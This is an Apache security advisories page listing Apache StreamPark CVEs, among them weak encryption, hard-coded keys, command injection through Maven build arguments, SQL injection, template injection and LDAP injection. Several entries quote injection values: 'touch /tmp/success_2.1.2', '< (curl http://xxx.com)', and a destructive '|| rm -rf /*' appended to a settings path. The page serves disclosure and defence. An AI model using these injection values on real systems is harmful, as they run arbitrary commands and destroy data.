Apache StreamPark security advisories
Security information for Apache StreamPark
Reporting
Do you want disclose a potential security issue for Apache StreamPark? You can read more about the projects’ security policy on their security page, and email your report to the Apache Security Team.
Advisories
This section is experimental: it provides advisories since 2023 and may lag behind the official CVE publications. It may also lack details found on the project security page. If you have any feedback on how you would like this data to be provided, you are welcome to reach out on our public mailinglist or privately on security@apache.org
Weak Encryption Algorithm in StreamPark
CVE-2025-54981 [CVE] [CVE json] [OSV json]
Last updated: 2025-12-12T15:10:32.960Z
Affected
- Apache StreamPark from 2.0.0 before 2.1.7
Description
Weak Encryption Algorithm in StreamPark, The use of an AES cipher in ECB mode and a weak random number generator for encrypting sensitive data, including JWT tokens, may have risked exposing sensitive authentication data
This issue affects Apache StreamPark: from 2.0.0 before 2.1.7.
Users are recommended to upgrade to version 2.1.7, which fixes the issue.
References
Credits
- omkar parkhe omkarparth@gmail.com (finder)
Use hard-coded key vulnerability
CVE-2025-54947 [CVE] [CVE json] [OSV json]
Last updated: 2025-12-12T15:11:36.470Z
Affected
- Apache StreamPark from 2.0.0 before 2.1.7
Description
In Apache StreamPark versions 2.0.0 through 2.1.7, a security vulnerability involving a hard-coded encryption key exists. This vulnerability occurs because the system uses a fixed, immutable key for encryption instead of dynamically generating or securely configuring the key. Attackers may obtain this key through reverse engineering or code analysis, potentially decrypting sensitive data or forging encrypted information, leading to information disclosure or unauthorized system access.
This issue affects Apache StreamPark: from 2.0.0 before 2.1.7.
Users are recommended to upgrade to version 2.1.7, which fixes the issue.
References
Credits
- omkarparth@gmail.com (finder)
Uses the user’s password as the secret key
CVE-2025-53960 [CVE] [CVE json] [OSV json]
Last updated: 2025-12-16T10:08:35.119Z
Affected
- Apache StreamPark from 2.0.0 before 2.1.7
Description
When issuing JSON Web Tokens (JWT), Apache StreamPark directly uses the user's password as the HMAC signing key (e.g., with the HS256 algorithm). An attacker can exploit this vulnerability to perform offline brute-force attacks on the user's password using a captured JWT, or to arbitrarily forge identity tokens for the user if the password is already known, ultimately leading to complete account takeover.
Users are recommended to upgrade to version 2.1.7, which fixes the issue.
References
Credits
- omkar parkhe omkarparth@gmail.com (finder)
Authenticated users can trigger remote command execution
CVE-2025-30001 [CVE] [CVE json] [OSV json]
Last updated: 2025-10-10T09:52:24.458Z
Affected
- Apache StreamPark from 2.1.4 before 2.1.6
Description
Incorrect Execution-Assigned Permissions vulnerability in Apache StreamPark.
This issue affects Apache StreamPark: from 2.1.4 before 2.1.6.
Users are recommended to upgrade to version 2.1.6, which fixes the issue.
References
Credits
- Liufeng Yi (ylf@yiliufeng.net) (reporter)
SQL injection vulnerability
CVE-2024-48988 [CVE] [CVE json] [OSV json]
Last updated: 2025-08-22T16:18:41.486Z
Affected
- Apache StreamPark from 2.1.4 before 2.1.6
Description
SQL Injection vulnerability in Apache StreamPark.
This issue affects Apache StreamPark: from 2.1.4 before 2.1.6.
Users are recommended to upgrade to version 2.1.6, which fixes the issue.
This vulnerability is present only in the distribution package (SpringBoot platform) and does not involve Maven artifacts.
It can only be exploited after a user has successfully logged into the platform (implying that the attacker would first need to compromise the login authentication).
As a result, the associated risk is considered relatively low.
References
Credits
- Xingchen Chen, Ze Jin, wh1t3p1g, yhbl, Qixu Liu Institute of Information Engineering, CAS (reporter)
Apache StreamPark IDOR Vulnerability
CVE-2024-34457 [CVE] [CVE json]
Last updated: 2024-09-11T11:03:06.370Z
Affected
- Apache StreamPark from 1.0.0 before 2.1.4
Description
References
- https://lists.apache.org/thread/brlfrmvw9dcv38zoofmhxg7qookmwn7j
- https://www.openwall.com/lists/oss-security/2024/07/22/2
Credits
- L0ne1y (reporter)
maven build params could trigger remote command execution
CVE-2024-29737 [CVE] [CVE json] [OSV json]
Last updated: 2024-07-17T08:21:09.036Z
Affected
- Apache StreamPark (incubating) from 2.0.0 before 2.1.4
Description
In streampark, the project module integrates Maven’s compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.
Background info:
Log in to Streampark using the default username (e.g. test1, test2, test3) and the default password (streampark). Navigate to the Project module, then add a new project. Enter the git repository address of the project and input
touch /tmp/success_2.1.2 as the “Build Argument”. Note that there is no verification and interception of the special character “". As a result, you will find that this injection command will be successfully executed after executing the build.<br></span></span><br><div>In the latest version, the special symbol is intercepted.References
Credits
- L0ne1y (reporter)
FreeMarker SSTI RCE Vulnerability
CVE-2024-29178 [CVE] [CVE json] [OSV json]
Last updated: 2024-07-18T11:15:55.181Z
Affected
- Apache StreamPark from 1.0.0 before 2.1.4
Description
On versions before 2.1.4, a user could log in and perform a template injection attack resulting in Remote Code Execution on the server, The attacker must successfully log into the system to launch an attack, so this is a moderate-impact vulnerability.
References
Credits
- L0ne1y (reporter)
Information leakage vulnerability
CVE-2024-29120 [CVE] [CVE json] [OSV json]
Last updated: 2024-07-17T14:59:02.804Z
Affected
- Apache StreamPark from 2.0.0 before 2.1.4
Description
In Streampark (version < 2.1.4), when a user logged in successfully, the Backend service would return “Authorization” as the front-end authentication credential. User can use this credential to request other users’ information, including the administrator’s username, password, salt value, etc.
References
Credits
- L0ne1y (reporter)
session not invalidated after logout
CVE-2024-29070 [CVE] [CVE json] [OSV json]
Last updated: 2025-02-06T14:33:02.169Z
Affected
- Apache StreamPark from 1.0.0 before 2.1.4
Description
On versions before 2.1.4, session is not invalidated after logout. When the user logged in successfully, the Backend service returns “Authorization” as the front-end authentication credential. “Authorization” can still initiate requests and access data even after logout.
References
Credits
- L0ne1y (reporter)
Unchecked maven build params could trigger remote command execution
CVE-2023-52291 [CVE] [CVE json] [OSV json]
Last updated: 2024-07-17T08:16:10.844Z
Affected
- Apache StreamPark (incubating) from 2.0.0 before 2.1.4
Description
In streampark, the project module integrates Maven’s compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.
Background:
In the “Project” module, the maven build args “<” operator causes command injection. e.g : “< (curl http://xxx.com)” will be executed as a command injection,
References
Credits
- thiscodecc of MoyunSec Vlab and Bing (finder)
Unchecked SQL query fields trigger SQL injection vulnerability
CVE-2023-52290 [CVE] [CVE json] [OSV json]
Last updated: 2024-07-16T07:37:36.828Z
Affected
- Apache StreamPark (incubating) from 2.0.0 before 2.1.4
Description
In streampark-console the list pages(e.g: application pages), users can sort page by field. This sort field is sent from the front-end to the back-end, and the SQL query is generated using this field. However, because this sort field isn’t validated, there is a risk of SQL injection vulnerability. The attacker must successfully log into the system to launch an attack, which may cause data leakage. Since no data will be written, so this is a low-impact vulnerability.
all users should upgrade to 2.1.4, Such parameters will be blocked.
References
Credits
- thiscodecc of MoyunSec Vlab and Bing (reporter)
Authenticated system users could trigger remote command execution
CVE-2023-49898 [CVE] [CVE json] [OSV json]
Last updated: 2023-12-15T12:13:22.953Z
Affected
- Apache StreamPark (incubating) from 2.0.0 before 2.1.2
Description
/usr/share/java/maven-3/conf/settings.xml || rm -rf /*
References
Authenticated system users could trigger SQL injection vulnerability
CVE-2023-30867 [CVE] [CVE json] [OSV json]
Last updated: 2023-12-15T12:13:59.544Z
Affected
- Apache StreamPark (incubating) from 2.0.0 before 2.1.2
Description
References
Logic error causing any account reset
CVE-2022-46365 [CVE] [CVE json] [OSV json]
Last updated: 2023-05-01T14:53:47.030Z
Affected
- Apache StreamPark (incubating) from 1.0.0 before 2.0.0
Description
References
Upload any file to any directory
CVE-2022-45802 [CVE] [CVE json] [OSV json]
Last updated: 2023-06-26T10:23:44.595Z
Affected
- Apache StreamPark (incubating) from 1.0.0 before 2.0.0
Description
References
LDAP Injection Vulnerability
CVE-2022-45801 [CVE] [CVE json] [OSV json]
Last updated: 2023-05-01T14:50:06.013Z
Affected
- Apache StreamPark (incubating) from 1.0.0 before 2.0.0
Description
LDAP Injection is an attack used to exploit web based applications
that construct LDAP statements based on user input. When an
application fails to properly sanitize user input, it's possible to
modify LDAP statements through techniques similar to SQL Injection.
LDAP injection attacks could result in the granting of permissions to
unauthorized queries, and content modification inside the LDAP tree.
This risk may only occur when the user logs in with ldap, and the user
name and password login will not be affected, Users of the affected
versions should upgrade to Apache StreamPark 2.0.0 or later.